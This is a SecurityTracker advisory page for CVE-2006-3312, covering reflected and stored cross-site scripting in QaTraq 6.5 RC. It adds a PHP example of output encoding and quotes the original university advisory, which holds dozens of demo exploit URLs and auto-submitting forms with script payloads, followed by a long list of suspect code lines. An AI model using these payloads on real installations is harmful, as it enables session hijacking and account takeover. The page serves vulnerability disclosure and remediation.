SecurityTracker.com
Category:   Application (Generic)  >   QaTraq
Vendors:   testmanagement.com
QaTraq Input Validation Hole Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1016381
SecurityTracker URL:  http://securitytracker.com/id/1016381
CVE Reference:   CVE-2006-3312
Updated:  Aug 14 2006
Original Entry Date:  Jun 26 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 6.5 RC and prior versions
Description:   A vulnerability was reported in QaTraq. A remote user can conduct cross-site scripting attacks.

Numerous scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the QaTraq software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
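
The three output contexts that the advisory's demo inputs target (element text, a quoted attribute value and a textarea body), rendered once unfiltered and once with output encoding. This is an added example, not QaTraq code or the vendor's fix: the markup, the function names and the `read_params` helper are hypothetical, and only the parameter names and test values are taken from the advisory quoted below.

```php
<?php
declare(strict_types=1);

// Added example: a constructed page fragment, not QaTraq source code.

// Encode for HTML text and quoted-attribute contexts. ENT_QUOTES covers both
// ' and ", which matters because the advisory's inputs begin with '"> so that
// they close an attribute whichever quoting style the page uses.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read each expected parameter from a named request array instead of relying
// on register_globals. Non-string values (e.g. ?msg[]=x) become ''.
function read_params(array $get, array $post): array
{
    $sources = ['msg' => $get, 'component_name' => $post, 'component_desc' => $post];
    $out = [];
    foreach ($sources as $key => $src) {
        $value = $src[$key] ?? '';
        $out[$key] = is_string($value) ? $value : '';
    }
    return $out;
}

// The reported pattern: request values written into the page as-is.
function render_unfiltered(array $in): string
{
    return '<p class="msg">' . $in['msg'] . "</p>\n"
        . '<input type="text" name="component_name" value="' . $in['component_name'] . "\"/>\n"
        . '<textarea name="component_desc">' . $in['component_desc'] . "</textarea>\n";
}

// Same markup, every value encoded at the point of output.
function render_encoded(array $in): string
{
    return '<p class="msg">' . h($in['msg']) . "</p>\n"
        . '<input type="text" name="component_name" value="' . h($in['component_name']) . "\"/>\n"
        . '<textarea name="component_desc">' . h($in['component_desc']) . "</textarea>\n";
}

// Crude check for markup that a browser would parse as a script element.
function count_script_tags(string $html): int
{
    return substr_count(strtolower($html), '<script');
}

// Constructed request data, using the demo values from the advisory.
$get  = ['msg' => "<script>alert('hi')</script>"];
$post = [
    'component_name' => '"><script>alert("hi")</script>',
    'component_desc' => '</textarea><script>alert("hi")</script>',
];

$in = read_params($get, $post);
$pages = [
    'unfiltered' => render_unfiltered($in),
    'encoded'    => render_encoded($in),
];

foreach ($pages as $label => $html) {
    printf("%-10s script tags in output: %d\n%s\n", $label, count_script_tags($html), $html);
}
```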

It may be possible to inject SQL commands, as well.

The original advisory is available at:

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt

Nenad Jovanovic of the Secure Systems Lab at the Technical University of Vienna reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the QaTraq software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fixed version (6.8 RC).
Vendor URL:  sourceforge.net/projects/qatraq/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  QaTraq 6.5 RC: Multiple XSS Vulnerabilities

===========================================================

QaTraq 6.5 RC: Multiple XSS Vulnerabilities

===========================================================

Technical University of Vienna Security Advisory

TUVSA-0606-001, June 23, 2006

===========================================================



Affected applications

----------------------


QaTraq (http://sourceforge.net/projects/qatraq/)


Versions 6.5 RC and prior.



Description

------------


There are a number of reflected XSS vulnerabilities, some of which are also stored XSS vulnerabilities and perhaps even SQL injection vulnerabilities. The affected program points as well as demo exploits are given below. The exploits have been tested with the user being logged in as admin, and register_globals being active. It is possible that some vulnerabilities do not require register_globals to be enabled, although we have not tested this. Some of the parameters in the given sample exploits (mainly "id" params) have to be adjusted to the given installation to match existing database entries.


In addition to program points for which exploits are given, we have listed about 200 places that are very similar in structure. Although we have not explicitly tested them with exploits, we suspect that they are vulnerable as well.


top.inc

---------


line 1005

http://localhost/qatraq65rc/queries_view_search.php?link_print='"><script>alert('hi')</script>


line 1007

http://localhost/qatraq65rc/queries_view_search.php?link_upgrade='"><script>alert('hi')</script>


line 1020

http://localhost/qatraq65rc/queries_view_search.php?link_sql='"><script>alert('hi')</script>


line 1041

http://localhost/qatraq65rc/queries_view_search.php?link_next="><script>alert('hi')</script>


line 1054

http://localhost/qatraq65rc/queries_view_search.php?link_prev="><script>alert('hi')</script>


line 1067

http://localhost/qatraq65rc/queries_view_search.php?link_list="><script>alert('hi')</script>



components_copy_content.php

-----------------------------


line 233

http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>

[product_id and id (= component id) must exist in the database]


line 238

- use the attack page:

<form method="post" action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 260

- analogous to 238:

<form method="post" action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='some_new_name'/>

<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



components_modify_content.php

-------------------------------


line 213

http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>


line 218

<form method="post" action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 240

<form method="post" action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='some_new_name'/>

<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



components_new_content.php

-----------------------------


line 188

http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>


line 193

<form method="post" action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 215

<form method="post" action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="component_name" value='another_new_name'/>

<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



design_copy_content.php

-------------------------


line 262

- use this page [plan_id must exist in the database]:

<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 276

<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 313

<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



design_copy_plan_search.php

-----------------------------


line 106

<form method="post" action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="plan_title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 107

<form method="post" action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="plan_content" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


design_modify_content.php

---------------------------


line 282

<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 298

- $new_doc_id is constructed from $major_version and $minor_version on line 189; these two are only set if POST['version_increment'] is set; use this page [and watch for suitable id]:

<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=7">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 311

- $new_version, analogous to 298


line 354

<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=10">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


design_new_content.php

------------------------


line 226

<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 240

<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 276

<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


design_new_search.php

-----------------------


line 99

http://localhost/qatraq65rc/design_new_search.php?plan_name="><script>alert('hi')</script>


line 100

http://localhost/qatraq65rc/design_new_search.php?plan_desc="><script>alert('hi')</script>


download.php

-------------


line 31

http://localhost/qatraq65rc/download.php?file_name=<script>alert('hi')</script>


login.php

----------


line 88

http://localhost/qatraq65rc/login.php?username="><script>alert('hi')</script>


line 98

http://localhost/qatraq65rc/login.php?password="><script>alert('hi')</script>


phase_copy_content.php

------------------------


line 245

<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 259

<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 285

<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_delete_search.php

-------------------------


line 176

<form method="post" action="http://localhost/qatraq65rc/phase_delete_search.php">

<input type="hidden" name="page_action" value="search"/>

<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_modify_content.php

--------------------------


line 273

<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 289

<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 302

- $new_version, analogous to 289


line 335

<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_modify_search.php

------------------------


line 177

<form method="post" action="http://localhost/qatraq65rc/phase_modify_search.php">

<input type="hidden" name="page_action" value="search"/>

<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_new_content.php

----------------------


line 209

<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 223

<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="version" value='<script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 252

<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


phase_view_search.php

----------------------


line 176

<form method="post" action="http://localhost/qatraq65rc/phase_view_search.php">

<input type="hidden" name="page_action" value="search"/>

<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


products_copy_content.php

---------------------------


line 175

http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>


line 180

<form method="post" action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="product_name" value='"><script>alert("hi")</script>'/>

<input type="submit"/>

</form>


line 185

<form method="post" action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">

<input type="hidden" name="page_action" value="save"/>

<input type="hidden" name="product_name" value='some_new_name'/>

<input type="hidden" name="product_desc" value='</textarea><script>alert("hi")</script>'/>

<input type="submit"/>

</form>



Other suspicious places (without exploits)

---------------------------------------------


- products_copy_search.php, line 116, $product_name

- products_copy_search.php, line 117, $product_desc

- products_delete_search.php, line 116, $product_name

- products_delete_search.php, line 117, $product_desc

- products_modify_content.php, line 186, $msg

- products_modify_content.php, line 191, $product_name

- products_modify_content.php, line 196, $product_desc

- products_modify_search.php, line 116, $product_name

- products_modify_search.php, line 117, $product_desc

- products_new_content.php, line 157, $msg

- products_new_content.php, line 162, $product_name

- products_new_content.php, line 167, $product_desc

- products_view_search.php, line 116, $product_name

- products_view_search.php, line 117, $product_desc

- queries_copy_content.php, line 182, $msg

- queries_copy_content.php, line 195, $title

- queries_copy_content.php, line 227, $description

- queries_copy_search.php, line 154, $title

- queries_copy_search.php, line 155, $id

- queries_copy_search.php, line 170, $description

- queries_delete_search.php, line 152, $title

- queries_delete_search.php, line 153, $id

- queries_delete_search.php, line 167, $description

- queries_modify_content.php, line 247, $msg

- queries_modify_content.php, line 260, $title

- queries_modify_content.php, line 292, $description

- queries_modify_content.php, line 308, $query

- queries_modify_search.php, line 152, $title

- queries_modify_search.php, line 153, $id

- queries_modify_search.php, line 167, $description

- queries_new_content.php, line 162, $msg

- queries_new_content.php, line 174, $title

- queries_new_content.php, line 222, $query

- queries_view_search.php, line 156, $title

- queries_view_search.php, line 157, $id

- queries_view_search.php, line 172, $description

- reports_copy_content.php, line 202, $msg

- reports_copy_content.php, line 215, $title

- reports_copy_content.php, line 247, $description

- reports_copy_content.php, line 255, $tmt

- reports_copy_search.php, line 147, $title

- reports_copy_search.php, line 148, $id

- reports_delete_search.php, line 148, $title

- reports_delete_search.php, line 149, $id

- reports_modify_content.php, line 266, $msg

- reports_modify_content.php, line 279, $title

- reports_modify_content.php, line 311, $description

- reports_modify_content.php, line 319, $query  $tmt

- reports_modify_search.php, line 148, $title

- reports_modify_search.php, line 149, $id

- reports_new_content.php, line 162, $msg

- reports_new_content.php, line 174, $title

- reports_new_content.php, line 190, $report_type

- reports_new_content.php, line 206, $description

- reports_new_content.php, line 214, $query  $tmt

- reports_view_content.php, line 187, $tmt 

- reports_view_content.php, line 194, $results

- reports_view_search.php, line 147, $title

- reports_view_search.php, line 148, $id

- reports_view_search.php, line 147, $title

- reports_view_search.php, line 148, $id

- requ_copy_content.php, line 217, $title

- requ_copy_content.php, line 252, $url

- requ_copy_content.php, line 274, $content

- requ_modify_content.php, line 209, $title

- requ_modify_content.php, line 244, $url

- requ_modify_content.php, line 266, $content

- requ_new_content.php, line 185, $title

- requ_new_content.php, line 214, $url

- requ_new_content.php, line 237, $content

- requ_new_search.php, line 99, $product_name

- requ_new_search.php, line 100, $product_desc

- results_modify_multiple.php, line 657, -> includes/ui.inc, line 116

- results_modify_multiple.php, line 395, $msg

- results_modify_search.php, line 182, $content

- results_modify_single.php, line 429, $msg

- results_modify_single.php, line 850, $TestDate

- results_view_multiple.php, line 125, $msg

- results_view_search.php, line 182, $content

- results_view_single.php, line 164, $msg

- roles_copy_content.php, line 190, $msg

- roles_copy_content.php, line 195, $role_name

- roles_copy_content.php, line 200, $role_desc

- roles_copy_search.php, line 117, $role_name

- roles_copy_search.php, line 118, $role_desc

- roles_delete_search.php, line 118, $role_name

- roles_delete_search.php, line 119, $role_desc

- roles_modify_content.php, line 203, $msg

- roles_modify_content.php, line 208, $role_name

- roles_modify_content.php, line 213, $role_desc

- roles_modify_search.php, line 118, $role_name

- roles_modify_search.php, line 119, $role_desc

- roles_new_content.php, line 172, $msg

- roles_new_content.php, line 177, $role_name

- roles_new_content.php, line 182, $role_desc

- roles_view_search.php, line 118, $role_name

- roles_view_search.php, line 119, $role_desc

- test_cases_copy_content.php, line 357, -> includes/ui.inc, line 198, $base_url

- test_cases_copy_content.php, line 289, $title

- test_cases_copy_content.php, line 303, $version

- test_cases_copy_content.php, line 382, $content

- test_cases_modify_content.php, line 383, $title

- test_cases_modify_content.php, line 399, $new_doc_id

- test_cases_modify_content.php, line 412, $new_version

- test_cases_modify_content.php, line 486, $content

- test_cases_modify_content.php, line 536, $filter_title

- test_cases_modify_content.php, line 537, $filter_tsc_id

- test_cases_new_content.php, line 341, $title

- test_cases_new_content.php, line 355, $version

- test_cases_new_content.php, line 431, $content

- test_cases_new_content.php, line 481, $filter_title

- test_cases_new_content.php, line 482, $filter_tsc_id

- test_cases_new_search.php, line 99, $product_name

- test_cases_new_search.php, line 100, $product_desc

- test_cases_view_content.php, line 302, $filter_tsc_id

- test_plans_copy_content.php, line 274, $title

- test_plans_copy_content.php, line 292, $version

- test_plans_copy_content.php, line 344, $content

- test_plans_modify_content.php, line 306, $title

- test_plans_modify_content.php, line 322, $new_doc_id

- test_plans_modify_content.php, line 339, $new_version

- test_plans_modify_content.php, line 398, $content

- test_plans_new_content.php, line 240, $title

- test_plans_new_content.php, line 258, $version

- test_plans_new_content.php, line 313, $content

- test_plans_new_search.php, line 96, $project_name

- test_plans_new_search.php, line 97, $project_desc

- test_scripts_copy_content.php, line 354, $title

- test_scripts_copy_content.php, line 368, $version

- test_scripts_copy_content.php, line 500, $content

- test_scripts_copy_design_search.php, line 100, $design_title

- test_scripts_copy_search.php, line 180, $content

- test_scripts_delete_search.php, line 182, $content

- test_scripts_include_cases_search.php, line 417, -> includes/ui.inc, line 34, $table_name

- test_scripts_include_cases_search.php, line 1068, -> includes/ui.inc, line 34, $table_name

- test_scripts_include_cases_search.php, line 875, -> includes/ui.inc, line 198, $base_url

- test_scripts_include_cases_search.php, line 427, $msg

- test_scripts_include_cases_search.php, line 576, $test_script[Title]

- test_scripts_include_cases_search.php, line 798, $tc_msg

- test_scripts_include_cases_search.php, line 809, $tc_title

- test_scripts_include_cases_search.php, line 823, $tc_version

- test_scripts_include_cases_search.php, line 1074, $row[Title]

- test_scripts_include_cases_search.php, line 1084, $row

- test_scripts_include_cases_search.php, line 1087, $row 

- test_scripts_include_cases_search.php, line 1096, $row[DocumentID]

- test_scripts_include_cases_search.php, line 1105, $row[ID]

- test_scripts_include_cases_search.php, line 1106, $row[ID]

- test_scripts_include_cases_search.php, line 1108, $row[ID]

- test_scripts_include_cases_search.php, line 1109, $row[ID]

- test_scripts_include_cases_search.php, line 1118, $row 

- test_scripts_include_cases_search.php, line 1124, $row  $ordering 

- test_scripts_include_search.php, line 163, $content

- test_scripts_modify_content.php, line 404, $title

- test_scripts_modify_content.php, line 420, $new_doc_id

- test_scripts_modify_content.php, line 433, $new_version

- test_scripts_modify_content.php, line 581, $content

- test_scripts_modify_content.php, line 726, $ordering_

- test_scripts_modify_search.php, line 181, $content

- test_scripts_new_content.php, line 293, $title

- test_scripts_new_content.php, line 307, $version

- test_scripts_new_content.php, line 426, $content

- test_scripts_new_search.php, line 93, $design_title

- test_scripts_remove_cases_search.php, line 375, -> includes/ui.inc, line 34, $table_name

- test_scripts_remove_cases_search.php, line 138, -> includes/ui.inc, line 34, $table_name

- test_scripts_remove_cases_search.php, line 148, $msg

- test_scripts_remove_cases_search.php, line 256, $test_script[Title]

- test_scripts_remove_cases_search.php, line 381, $row[Title]

- test_scripts_remove_cases_search.php, line 387, $is_selected  $row

- test_scripts_remove_cases_search.php, line 393, $row[DocumentID]

- test_scripts_remove_cases_search.php, line 405, $row[Ordering]

- test_scripts_remove_cases_search.php, line 423, $row[Title]

- test_scripts_remove_search.php, line 165, $content

- test_scripts_view_search.php, line 182, $content

- upload.php, line 51

- users_copy_content.php, line 249, $msg

- users_copy_content.php, line 254, $login_name

- users_copy_content.php, line 258, $user_name

- users_copy_content.php, line 263, $user_password

- users_copy_search.php, line 129, $login_name

- users_copy_search.php, line 130, $user_name

- users_copy_search.php, line 131, $default_role

- users_delete_content.php, line 146, $msg

- users_delete_search.php, line 129, $login_name

- users_delete_search.php, line 130, $user_name

- users_delete_search.php, line 131, $default_role

- users_modify_content.php, line 463, -> includes/ui.inc, line 116, $arr_table_vals[table_multi_display_line.$i]

- users_modify_content.php, line 385, $msg

- users_modify_content.php, line 394, $user_name

- users_modify_content.php, line 399, $user_password

- users_modify_search.php, line 127, $login_name

- users_modify_search.php, line 128, $user_name

- users_modify_search.php, line 129, $default_role

- users_new_content.php, line 233, $msg

- users_new_content.php, line 238, $login_name

- users_new_content.php, line 242, $user_name

- users_new_content.php, line 247, $user_password

- users_new_content.php, line 251, $user_password2

- users_view_content.php, line 138, $msg

- users_view_search.php, line 129, $login_name

- users_view_search.php, line 130, $user_name

- users_view_search.php, line 131, $default_role

- versions_copy_content.php, line 370, $msg

- versions_copy_content.php, line 375, $version_name

- versions_copy_content.php, line 380, $version_desc

- versions_modify_content.php, line 345, $msg

- versions_modify_content.php, line 350, $version_name

- versions_modify_content.php, line 355, $version_desc

- versions_new_content.php, line 322, $msg

- versions_new_content.php, line 327, $version_name

- versions_new_content.php, line 332, $version_desc

- versions_new_content.php, line 339, $version_date



Solution

---------


The authors did not respond to our notification, so there is no official solution available yet.


Timeline:


June 2, 2006: Attempt to contact QaTraq developers via "ashmans at users dot sourceforge dot net" and "traq at users dot sourceforge dot net".


June 23, 2006: Advisory submission.



References

-----------


http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt



Nenad Jovanovic

Secure Systems Lab 

Technical University of Vienna 

www.seclab.tuwien.ac.at

 
 



Copyright 2018, SecurityGlobal.net LLC